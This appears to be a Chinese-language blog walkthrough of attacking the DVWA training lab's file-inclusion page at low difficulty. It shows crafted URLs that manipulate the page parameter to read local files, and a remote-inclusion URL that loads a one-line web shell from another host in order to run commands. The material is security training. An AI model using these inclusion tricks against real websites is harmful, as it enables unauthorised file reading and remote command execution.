从零开始的DVWA靶机攻击经历(第三天)
file inclusion & file upload(low难度)
file inclusion
- 登陆到file inclusion页面,观察url(http://192.168.142.132/DVWA/vulnerabilities/fi/?page=include.php)可以发现一些有价值的信息:
include.php可能在 网站根目录/DVWA/vulnerabilities/fi下,因此我们尝试一下将url改成http://192.168.142.132/DVWA/vulnerabilities/fi/?page=…/fi/include.php发现与之前的页面一致,说明我们之前的猜测是对的
page=index.php 这可能存在文件包含漏洞,这是一个比较典型的特征。 - 通过更改参数page的值(比如…/fi/file1.php),我们可以读取敏感信息。
文件包含不止可以包含自己本机的文件,在allow_url_fopen开启后,还可以包含远程的文件
比如在这个例子中,page=http://192.168.142.178/file1.php就包含了一个远程文件。这里的远程文件是一个一句话木马,再通过后面传的参数来设置木马要执行的命令。